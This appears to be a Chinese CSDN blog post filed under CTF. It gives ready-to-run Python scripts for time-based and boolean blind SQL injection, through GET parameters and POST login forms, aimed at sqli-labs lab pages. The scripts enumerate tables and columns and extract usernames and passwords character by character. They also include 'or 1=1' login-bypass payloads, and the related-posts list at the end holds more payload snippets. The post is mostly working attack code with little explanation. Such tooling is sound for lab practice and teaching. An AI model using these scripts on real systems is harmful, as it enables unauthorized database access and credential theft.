时间盲注,布尔盲注脚本

已于 2022-07-04 15:29:53 修改
阅读量367 收藏 1
点赞数
分类专栏: CTF 文章标签: 大数据
于 2022-07-01 23:24:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967669/article/details/125567309
版权 
时间盲注
# -*- coding: utf-8 -*-
"""
Created on Fri Jul  1 22:58:49 2022

@author: small_star
"""

import requests
import time

def get_tables():
    table = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for i in range(5):       
        chr_str = ''
        for j in range(1,9):   
            for k in range(33,127):
                payload = url+" and ascii(substr(({0}  limit {1},1),{2},1)) = {3} and sleep(2) %23".format(table,i,j,k)
                #print(payload)
                start_time = time.time()
                res = requests.get(url=payload)
                if time.time() - start_time > 2:
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            tables.append(chr_str)
    print(tables)
    for itm in tables:
        #get_column(itm)
        return itm
    
def get_column():   
    column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #% (table)'
    columns = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep(2) %23".format(column,i,j,k)
                #print(payload)
                start_time = time.time()
                res = requests.get(url=payload)
                if time.time() - start_time > 2:
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            columns.append(chr_str)
    print(columns)
    for itm in columns:
        #get_column(itm)
        return itm   
def get_data():
    data = "select username from users"
    # data = "select password from users"
    # data = "select password from users where username='flag' " 
    datas = []
    for i in range(5):
        chr_str = ''
        for j in range(1,15):
            for k in range(33,127):
                payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep(2) %23".format(data,i,j,k)
                #print(payload)
                start_time = time.time()
                res = requests.get(url=payload)
                if time.time() - start_time > 2:
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            datas.append(chr_str)
    print(datas)
if __name__ == '__main__':
    url = "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
    # table = get_tables()
    # column = get_column()
    get_data()
                        
布尔盲注

import requests

def get_tables():
    table = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                payload = url+" and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(table,i,j,k)
                #print(payload)
                res = requests.get(url=payload)
                if 'You are in' in res.text:  #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            tables.append(chr_str)
    print(tables)
    for itm in tables:
        #get_column(itm)
        return itm
def get_column():   
    column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #table_name根据情况改
    columns = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(column,i,j,k)
                #print(payload)
                res = requests.get(url=payload)
                if 'You are in' in res.text: #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            columns.append(chr_str)
    print(columns)
    for itm in columns:
        #get_column(itm)
        return itm   

def get_data():
    # data = "select userneame from users"
    # data = "select password from users"
    data = "select password from users where username='flag' " #sql语句根据需求改    
    datas = []
    for i in range(20):
        chr_str = ''
        for j in range(1,15):
            for k in range(33,127):
                payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(data,i,j,k)
                #print(payload)
                res = requests.get(url=payload)
                if 'You are in' in res.text: #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            datas.append(chr_str)
    print(datas)
if __name__ == '__main__':
    url = "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
    table = get_tables()
    column = get_column()
    get_data()
                      


POST传参
import requests

def get_schema():
    schema = 'select schema_name from information_schema.schemata'
    schemas = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(schema,i,j,k),"passwd":"","submit":"Submit"}
                #print(payload)
                res = requests.post(url,data=data)
                if 'flag.jpg' in res.text:  #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            schemas.append(chr_str)
    print(schemas)
    for itm in schemas:
        #get_column(itm)
        return itm
    

def get_tables():
    table = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                # data = {"uname":"1' or {}=0#".format(i),"passwd":"","submit":"Submit"} 
                data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(table,i,j,k),"passwd":"","submit":"Submit"}
                res = requests.post(url,data=data)
                # print(res.text)
                if 'flag.jpg' in res.text:  #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            tables.append(chr_str)
    print(tables)
    for itm in tables:
        #get_column(itm)
        return itm
def get_column():   
    column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #table_name根据情况改
    columns = []
    for i in range(5):
        chr_str = ''
        for j in range(1,9):
            for k in range(33,127):
                data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(column,i,j,k),"passwd":"","submit":"Submit"}
                # print(payload)
                res = requests.post(url,data=data)
                if 'flag.jpg' in res.text: #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            columns.append(chr_str)
    print(columns)
    for itm in columns:
        #get_column(itm)
        return itm   

def get_data():
    # data = "select userneame from users"
    # data = "select password from users"
    shuju = "select password from users " #sql语句根据需求改     where username=''
    shujus = []
    for i in range(20):
        chr_str = ''
        for j in range(1,15):
            for k in range(33,127):
                data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(shuju,i,j,k),"passwd":"","submit":"Submit"}
                #print(payload)
                res = requests.post(url,data=data)
                if 'flag.jpg' in res.text: #you are in根据情况改
                    chr_str+=chr(k)
                    print(chr_str)
                else:
                    pass
        if chr_str=='':
            break
        else:
            shujus.append(chr_str)
    print(shujus)
def get():

                data = {"uname":"1' or 1=1#","passwd":"","submit":"Submit"}
                # print(payload)
                res = requests.post(url,data=data)
                print(res.text)
                if 'flag.jpg' in res.text:  #you are in根据情况改                   
                    print(1213213)
                else:
                    pass

if __name__ == '__main__':
    url = "http://fd5205d2.lxctf.net/Less-15/"
    # schema = get_schema()
    # get()
    # table = get_tables()
    # column = get_column()
    get_data()


                        

小星星+yg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
布尔盲注(ctfhub)
最新发布
2401_82985722的博客
03-27 613
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注的python脚本,其中语句需要根据环境条件做改变
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现,爆的比较慢,仅供参考。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 2837
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 458
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1730
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 820
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
SQL注入布尔盲注
qq_45557130的博客
10-04 725
sql注入布尔盲注
sql注入(比较法盲注 POST
qq_43520778的博客
09-11 134
[toc]sql注入。
SQL-labs练习记录(16~20)【post时间盲注,密码注入,UA注入,referer注入,cookie注入】
bin789456的博客
08-22 444
post时间盲注,附带新脚本,从包入手,更改各项数据。
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 814
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
SQL注入脚本编写
L1ni01
11-13 2045
SQL注入脚本编写 穷举 1.bool盲注脚本(post型) import requests url = "http://127.0.0.1/sqli-labs-master/Less-15/" result ="" for i in range(1,10): for j in range(65,150): payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j) payload2 = "admin'^(ascii(
Bool盲注脚本
Forever_Han13的博客
01-21 620
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
python布尔盲注脚本
kiihuang的博客
03-28 464
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
SQL | POST基于时间布尔盲注
m_de_g的博客
12-06 1398
SQL | POST基于时间布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间盲注 3.POST基于布尔盲注 4.sqlmap安全测试 ...
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值